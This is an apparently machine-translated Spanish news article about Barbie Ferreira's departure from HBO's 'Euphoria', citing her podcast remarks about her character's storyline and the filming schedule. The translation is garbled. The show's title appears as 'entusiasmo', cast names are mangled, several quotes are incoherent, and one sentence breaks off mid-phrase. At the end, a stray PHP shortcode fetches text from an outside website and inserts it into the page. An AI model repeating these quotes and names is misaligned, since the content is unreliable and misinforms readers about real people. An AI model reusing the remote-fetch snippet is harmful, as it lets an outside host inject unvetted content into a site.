entusiasmo Actor barbie ferreira recientemente habló sobre su salida de la serie de HBO. Experto en sillones con Dax Shepard podcast Ferreira anunció su partida en agosto pasado antes de la tercera temporada de la serie. Ferreira, que ya no quería interpretar a Kate Hernández, compartió la noticia en las redes sociales. Meses después, detalla que fue una “decisión mutua” dejar la serie porque faltaba la trama del personaje.





Al momento de su partida, especulaciones y muchos rumores siguieron a la decisión de Ferreira de dejar la serie de HBO ganadora de un Emmy. En algunos informes, incluso se rumoreaba que Ferreira se alejó del escenario debido al drama detrás de escena. entusiasmo Ha habido una reacción violenta recientemente debido al caos que rodea al expositor y al autor. sam levinson. Sin embargo, Ferreira explicó que su decisión de renunciar fue creativa porque no veía que su positividad corporal avanzara. “Sam, yo… fue una lucha encontrar la continuidad. Así que fue muy doloroso ver eso y ver a los fanáticos molestos. Sentí que tal vez me quedé un poco más de lo esperado. ¿Lo aumentaste?” Ferreira continúa describiendo el agotamiento que rodeaba el intento de Kate de mantener viva la historia. entusiasmo.



“No creo que hubiera ningún lugar al que ella pudiera ir”, dijo Ferreira. “Creo que había lugares a los que podría haber ido. No creo que hubiera encajado en el programa. No sé si eso es justo para él o no, y creo que ambas partes sabían que realmente quería ir. La grasa no puede ser un mejor amigo. Yo no quería jugarlo, y creo que ellos tampoco”.





barbie ferreira
Imagen a través de HBO Max




RELACIONADO: Decker Montgomery y Barbie Ferrera en el remake de ‘Face of Death’





La programación también jugó un papel en la salida de Ferreira.


Ferreira también afirmó que el rodaje de una temporada entusiasmo Le tomó alrededor de nueve meses, lo que significa que no pudo concentrarse en otro trabajo que enfatizaba el enfoque de su carrera creativa para dejar el programa. dio no queEl actor también cerró los rumores de que abandonó el escenario después de revelar que una vez se torció el tobillo y lo enviaron a hacerse una radiografía.



Euphoria sigue a un grupo de estudiantes de secundaria mientras navegan por el mundo de las drogas, el sexo, el trauma, las redes sociales y más. El drama adolescente es popular entre su elenco popular. Zendía., Cazador Shaffer, Nube Angus, Jacob Alverdi.Y Sidney Sweeney.



HBO renovado. entusiasmo para una tercera temporada, aunque no se ha anunciado una fecha de lanzamiento oficial. entusiasmo La temporada 3 puede llegar en 2024. Mientras tanto, aquí hay un clip de Ferreira. entusiasmoKate Hernández:



Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');